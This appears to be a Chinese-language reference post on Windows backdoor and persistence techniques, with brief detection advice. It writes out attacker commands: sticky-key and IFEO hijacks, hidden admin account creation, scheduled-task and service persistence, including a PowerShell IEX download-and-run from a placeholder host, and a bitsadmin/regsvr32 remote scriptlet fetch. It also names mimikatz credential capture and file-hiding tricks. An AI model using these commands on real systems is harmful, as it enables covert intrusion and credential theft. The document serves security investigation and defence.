windows常见backdoor、权限维持方法及排查技术
字数 2297 2025-08-26 22:11:22
Windows常见后门及权限维持方法技术手册
1. 系统工具替换后门
1.1 直接替换系统工具
- 原理:替换系统自带的可执行文件(如sethc.exe粘滞键程序)
- 经典案例:Shift后门(替换sethc.exe)
- 实现方式:
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
1.2 注册表映像劫持
- 原理:通过注册表修改程序调试器路径
- 实现命令:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f - 常见可劫持程序:
- osk.exe(屏幕键盘)
- Narrator.exe(讲述人)
- Magnify.exe(放大镜)
1.3 Silent Process Exit技术
- 工具:Windows SDK中的gflags.exe
- 特点:程序静态退出时静默执行关联程序
- 优势:Autoruns工具无法检测
2. 后门账号技术
2.1 创建隐藏管理员账号
- 创建后门用户:
net user defaultuser0$ somepasswordhere /add /y net localgroup administrators defaultuser0$ /add net localgroup "remote desktop users" defaultuser0$ /add - 复制administrator的F值替换后门账户F值
- 导出注册表后删除用户:
net user defaultuser0$ /del - 通过注册表导入恢复隐藏账户
3. 安全支持提供程序(SSP)后门
3.1 原理
- 利用LSASS进程加载自定义SSP DLL
- 可捕获lsass进程中的明文凭据
3.2 实现方式
- 使用mimikatz的mimilib.dll
- 或使用memssp内存补丁方式
4. 文件隐藏技术
4.1 attrib命令隐藏
attrib +s +h malicious.exe
4.2 ADS流隐藏
- 原理:利用NTFS备用数据流隐藏文件
- 特点:
- 可绕过D盾等常见扫描工具
- 无法直接执行ADS中的Webshell,需通过include包含
- 检测方法:
或使用streams.exe工具dir /r
4.3 时间戳修改
- PowerShell命令:
$(Get-Item).creationtime=$(Get-Date "mm/dd/yyyy hh:mm am/pm") $(Get-Item).lastaccesstime=$(Get-Date "mm/dd/yyyy hh:mm am/pm") $(Get-Item).lastwritetime=$(Get-Date "mm/dd/yyyy hh:mm am/pm") - 工具:NewFileTime
5. 计划任务后门
5.1 schtasks命令
SCHTASKS /Create /RU "SYSTEM" /tn "AdobeReaderUpdate" /sc Weekly /d * /st 18:00:00 /tr "powershell.exe C:\Windows\System32\drivers\en-US\etc\Line.ps1"
5.2 at命令(已弃用)
at 1:00AM /Every:Saturday My_BackUp.bat
5.3 检测方法
schtasks /query
或使用Autoruns工具
6. 开机启动项
6.1 常见注册表路径
HKEY_CURRENT_USER\EnvironmentHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
6.2 示例
REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\Users\Administrator\Desktop\mal.exe"
6.3 隐藏注册表值技术
- 使用原生API创建regedit无法显示的键值
- 局限:Autoruns仍可检测
7. 服务后门
7.1 创建服务
sc create "主动防御" binpath= "cmd /c start powershell.exe IEX (new-object net.webclient).downloadstring('http://ip/a')"
sc config "主动防御" start= auto
7.2 删除服务
sc delete "主动防御"
8. waitfor.exe后门
8.1 特点
- 不支持自启动,但可远程主动激活
- 进程显示为waitfor.exe
8.2 检测
- 使用Process Explorer查看waitfor.exe进程
9. bitsadmin后门
9.1 实现步骤
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
bitsadmin /Resume backdoor
9.2 检测
bitsadmin /list /verbose
10. WMI后门
10.1 特点
- 无文件后门
- 系统重启5分钟内触发
- SYSTEM权限执行
10.2 检测
- 使用Autoruns工具
11. COM劫持
11.1 原理
- 拦截程序读取注册表中的DLL/EXE路径
- 类似DLL劫持
12. CLR后门
12.1 特点
- 无需管理员权限
- 通过添加环境变量实现
- 需要重启系统生效
13. Meterpreter权限维持
13.1 metsvc
- 服务型后门
- 开机自启动
13.2 persistence模块
- 上传vbs脚本修改注册表
- 路径:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
14. Empire persistence模块
14.1 分类
- Userland:普通权限
- Elevated:需要高权限
- Powerbreach:内存权限维持(重启失效)
- Miscellaneous:其他方法
15. 进程注入技术
15.1 常用注入目标
- lsass.exe
- explorer.exe
15.2 检测方法
- Process Explorer查看.NET Assemblies和.NET Performance菜单
- Process Monitor监控异常行为
16. 捆绑后门
16.1 常用工具
- BDF(Backdoor Factory)
- NimFileBinder(基于Nim语言,免杀效果好)
17. IIS模块后门
17.1 特点
- 开发自定义IIS模块实现持久化
18. 域环境后门
18.1 技术类型
- 配置ACL后门
- PasswordChangeNotify后门
19. 其他技术
19.1 DLL劫持
19.2 软件插件后门
19.3 Office后门
检测与排查工具推荐
- Autoruns:全面检测自启动项
- Process Explorer:查看进程详细信息
- Process Monitor:监控进程行为
- Streams.exe:检测ADS流
- 命令行工具:
dir /rschtasks /querybitsadmin /list /verbose
参考资源
- 国外安全研究员:
- Casey Smith (@subTee)
- Adam (@Hexacorn)
- 博客资源:
- https://kevien.github.io/
本手册总结了Windows系统中常见的后门植入和权限维持技术,涵盖了从简单的文件替换到复杂的无文件攻击技术。在实际防御中,建议结合多种检测工具进行综合排查,特别注意系统异常行为和非常规的自启动项。